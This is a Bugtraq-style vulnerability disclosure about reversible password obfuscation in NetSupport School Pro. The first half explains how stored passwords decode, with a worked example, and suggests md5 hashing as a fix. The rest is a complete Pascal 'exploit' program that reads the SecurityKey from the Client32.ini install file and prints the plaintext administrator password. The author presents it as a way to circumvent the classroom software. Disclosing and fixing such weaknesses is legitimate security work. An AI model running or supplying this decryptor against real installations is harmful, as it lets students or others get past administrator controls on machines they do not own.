NetSupport School Pro: Password Encryption Weaknesses
To the moderator, this is my first bugtraq posting, feel free to make any
changes you feel nessessary to make this more helpful. Thank you very much
Vendor : NetSupport
URL : http://www.netsupport-inc.com/
Version : Invision NetSupport School Pro
Risk : Password protection weakness
Description: NetSupport School, market leading training tool for the modern
classroom featuring full student remote control, application & internet
monitoring, customized student testing and more.
Password protection weakness: The password encryption method is a method
which is easily reversed. The encryption method is as follows:
The letters are expressed using a hexadecimal type of system. Every letter
is shown by two characters the first character can be any ascii character
while the second is in a range from a-p. This works just like hex in that
ap+1=ba. Its not case sensitive so that also makes it easier for kids to get
passes. The characters start at EM. So A= EM B=EN and so on. Each letter is
also added to by the number of letters in front of it. So the crypt of aa=
EN9O while the crypt of aaa=EO9P>A. I can figure the routine used for the
crypt of each colum though. Here is a reference for the letter a and its
crypt of each colum EM, 9O, >a, BC, FE, :G, >I, BK, FM, :O. Based on this
knowledge and the hex-esque characters, and the addition to each char based
on the amount of letters in front of it, you can get the password from an
encrypted one. An example of a cracked password: The crypt is ?GC;H@KEO? GC
-3 = FP (according to the hexish system) FP=T so the first letter is T. Take
9O (known ?a? for the 2nd column) and add the difference from a-t to it (19)
and you get ;B add 2 to it (amount of letters in front of it) = ;D then
subtract ;D from ;H you get 4 places. A+4 = E the second letter is ?E? you
continue to do this until you get the password ?test?
Solution: based on my research this program uses a hash type validation
method, so the quickest and most painless solution would be to use the md5
routine for passwords.
Credits: Credits go to Drexel University, and Harry Hoffman because if they
hadn?t have used this software I would have never had the urge to circumvent
it ;)
As well as Mr. Flynn for teaching me pascal (even though its 20+ years old
its still my favorite)
Spiffomatic64
Hacking is an art-form
Here is a program that will decrypt the password off of a machine with the
software running:
(old school :-D its written in pascal)
program exploit;
uses crt;
var i,j,length,x,y,crazy:integer;
passfile:text;
line:string;
password,p:array [1..100] of char;
known,convert:array [1..26,1..3] of char;
ch,tempx,tempy,key:char;
procedure conv;
begin
convert[1,1]:='E';
convert[1,2]:='M';
convert[1,3]:='A';
for i:=2 to 26 do begin
if convert[i-1,2]='P' then begin
convert[i,1]:=chr(ord(convert[i-1,1])+1);
convert[i,2]:='A';
end
else begin
convert[i,1]:=convert[i-1,1];
convert[i,2]:=chr(ord(convert[i-1,2])+1);
end;
convert[i,3]:=chr(ord(convert[i-1,3])+1);
end;
end;
procedure hex(a,b:char; num:integer);
begin
if num>0 then begin
for i:=1 to num do begin
if b='P' then begin
b:='A';
a:=chr(ord(a)+1);
end else inc(b);
end;
end;
if num<0 then begin
for i:=-1 downto num do begin
if b='A' then begin
b:='P';
a:=chr(ord(a)-1);
end else dec(b);
end;
end;
tempx:=a;
tempy:=b;
end;
function compare(a,b:char):char;
begin
for i:=1 to 26 do begin
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
end;
end;
function diff(a,b,c,d:char):integer;
var num1,num2,num3:integer;
begin
num1:=ord(a)*16+ord(b);
num2:=ord(c)*16+ord(d);
num2:=num2;
diff:=num2-num1;
end;
Begin
{get the hash from client32.ini}
clrscr;
Writeln(' _________________________________________________________');
Writeln('|NetSupport School Pro Password decryptor |');
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
Writeln('|and my wonderful fiance Halley |');
Writeln(' ---------------------------------------------------------');
Writeln('');
assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
reset (passfile);
i:=0;
while not eof(passfile) do
begin
line:='';
while not EoLn(passfile) do
begin
Read(passfile, ch);
line:=line+ch;
if line='SecurityKey=' then begin
while not eoln(passfile) do
begin
inc(i);
read(passfile,ch);
password[i]:=ch;
end;
length:=i;
end;
end;
readln(passfile,line);
end;
write('Hash: ');
for i:=1 to length do write(password[i]);
writeln('');
{decrypt the hash}
conv;
known[1,1]:='E';
known[1,2]:='M';
known[2,1]:='9';
known[2,2]:='O';
known[3,1]:='>';
known[3,2]:='A';
known[4,1]:='B';
known[4,2]:='C';
known[5,1]:='F';
known[5,2]:='E';
known[6,1]:=':';
known[6,2]:='G';
known[7,1]:='>';
known[7,2]:='I';
known[8,1]:='B';
known[8,2]:='K';
known[9,1]:='F';
known[9,2]:='M';
known[10,1]:=':';
known[10,2]:='O';
known[11,1]:='?';
known[11,2]:='A';
known[12,1]:='C';
known[12,2]:='C';
known[13,1]:='G';
known[13,2]:='E';
known[14,1]:=';';
known[14,2]:='G';
known[15,1]:='?';
known[15,2]:='I';
{get the first char}
for i:=1 to round(length/2) do p[i]:=chr(65);
for x:=1 to round(length/2) do begin
crazy:=0;
crazy:=-(round(length/2))+x;
for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);
hex(password[x*2-1],password[x*2],crazy);
p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
end;
writeln('');
write('Password: ');
for i:=1 to round(length/2) do begin
write(p[i]);
end;
readkey;
end.
_________________________________________________________________
Get tax tips, tools and access to IRS forms ? all in one place at MSN Money!
http://moneycentral.msn.com/tax/home.asp